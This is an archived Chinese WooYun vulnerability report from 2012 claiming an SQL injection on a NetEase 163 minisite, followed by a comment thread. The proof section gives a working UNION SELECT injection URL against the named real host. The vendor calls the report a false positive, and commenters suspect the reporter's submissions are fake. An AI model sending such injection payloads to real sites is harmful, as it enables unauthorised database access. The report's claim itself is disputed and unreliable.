漏洞概要
关注数(24)
关注此漏洞
漏洞标题:163存在SQL
相关厂商:网易
提交时间:2012-03-11 12:27
修复时间:2012-03-13 13:51
公开时间:2012-03-13 13:51
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:10
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2012-03-11: 细节已通知厂商并且等待厂商处理中
2012-03-13: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
不懂说看结果
详细说明:
http://minisite.163.com/2009/0909/wuliangye/article.php?id=58
漏洞证明:
http://minisite.163.com/2009/0909/wuliangye/article.php?id=58%20and%201=2%20union%20select%201,2,user(),database(),5,6,7,8
修复方案:
版权声明:转载请注明来源 .AK.@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2012-03-13 13:51
厂商回复:
感谢您对网易的关注,该问题为误报
最新状态:
暂无
漏洞评价:
评论
-
2012-03-11 13:27 |
明. ( 路人 | Rank:8 漏洞数:7 | ส็็็็็็็็็็็็็็็็็็็...)
-
2012-03-11 13:58 |
天行健 ( 路人 | Rank:20 漏洞数:3 | 业余信息安全爱好者,没事了玩一玩)
-
2012-03-11 14:12 |
imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )
-
2012-03-11 14:52 |
瓜瓜 ( 普通白帽子 | Rank:173 漏洞数:25 )
-
2012-03-11 15:15 |
xsser 
( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-03-11 16:21 |
.AK. ( 路人 | Rank:10 漏洞数:6 | AK 呵呵~ 记住要买黑阔证哦-)
看来~ 不给力呀~ 好吧 那明天再发几个吧!~ 搜狐 放弃这次的sql OK 给你们库吧!~ 不解释
-
2012-03-11 16:29 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
@.AK. 我想问下 为什么搜狐的都忽略了呢 我看的时候貌似也是假的 请自重啊
-
2012-03-11 17:33 |
.AK. ( 路人 | Rank:10 漏洞数:6 | AK 呵呵~ 记住要买黑阔证哦-)
-
2012-03-11 18:05 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-03-12 10:33 |
牛奶坦克 ( 普通白帽子 | Rank:355 漏洞数:21 | 晚安,牛奶)
@.AK. @xsser 这个是厂商修复了还是本身就是不存在的?为了避免这种事情,尽量都发一些证明截图吧,免得到后期说不清楚。
-
2012-03-12 11:26 |
天行健 ( 路人 | Rank:20 漏洞数:3 | 业余信息安全爱好者,没事了玩一玩)
@牛奶坦克 嗯,这个还是有必要的,像移动这一类无耻厂商命名发现他们的洞了,自己忽略又悄悄补洞,相当的不厚道,给个rank貌似能让他们怀孕似的
-
2012-03-12 12:43 |
搜狐(乌云厂商)
还是感谢楼主关注,但这两个确实没有漏洞,有洞我们肯定认。
-
2012-03-12 13:03 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2012-03-12 13:29 |
搜狐(乌云厂商)
@xsser 我们都认了这么多了,有必要少认两个吗?2010-05182 这不很早就在wooyun报过吗?
-
2012-03-12 13:42 |
iceyes ( 路人 | Rank:28 漏洞数:6 | 老马塞个里!)
一会儿我也发一个大漏洞吧,windows8 sql 注入漏洞,独家爆料
-
2012-03-12 13:58 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
@搜狐 可能的确是我们的机制问题 已经作为案例 待改进
-
2012-03-14 13:32 |
笨猪 ( 实习白帽子 | Rank:56 漏洞数:13 | Jarett|最近忙,洞发得少。。)
@xsser 貌似他发的这几个都是假的。。工具党?
